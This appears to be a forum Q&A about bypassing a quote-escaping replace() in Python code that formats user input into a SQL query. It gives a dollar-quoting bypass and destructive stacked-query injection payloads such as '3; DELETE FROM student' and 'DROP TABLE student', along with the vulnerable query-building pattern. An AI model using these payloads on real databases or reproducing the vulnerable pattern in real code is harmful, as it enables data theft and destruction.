Is there any way to exploit this code:
course = course.replace('\'', '\\\'')
query = "SELECT * FROM student WHERE cost_per_unit > {}".format(course)
to create a query like:
SELECT * FROM student WHERE cost_per_unit > 3; SELECT * FROM student WHERE column = 'ABC'
Here, Python throws a syntax error:
Syntax error at or near "\":
column = \'ABC\'
The replace() method in Python replaces that. Is there any work-around so I can somehow inject something?
SOLUTION
Since I have to compare strings, and I cannot use ' because the replace() messes it up, I used $$ dollar quoting.
So the course looked like:
3; SELECT * FROM student WHERE column = $$ABC$$
If course is "3; SELECT * FROM student WHERE column = 'ABC'", I don't get any syntax errors, but the result might not work as valid SQL:
>>> def a(course):
... course = course.replace('\'', '\\\'')
... query = "SELECT * FROM student WHERE cost_per_unit > {}".format(course)
... return query
...
>>> a("3; SELECT * FROM student WHERE column = 'ABC'")
"SELECT * FROM student WHERE cost_per_unit > 3; SELECT * FROM student WHERE column = \\'ABC\\'"
But the code is indeed very exploitable if other queries are possible. For this example, it would work just fine:
>>> a("3; SELECT * FROM student")
'SELECT * FROM student WHERE cost_per_unit > 3; SELECT * FROM student'
And so would these dangerous ones:
>>> a("3; DELETE FROM student")
'SELECT * FROM student WHERE cost_per_unit > 3; DELETE FROM student'
>>> a("DROP TABLE student")
'SELECT * FROM student WHERE cost_per_unit > DROP TABLE student'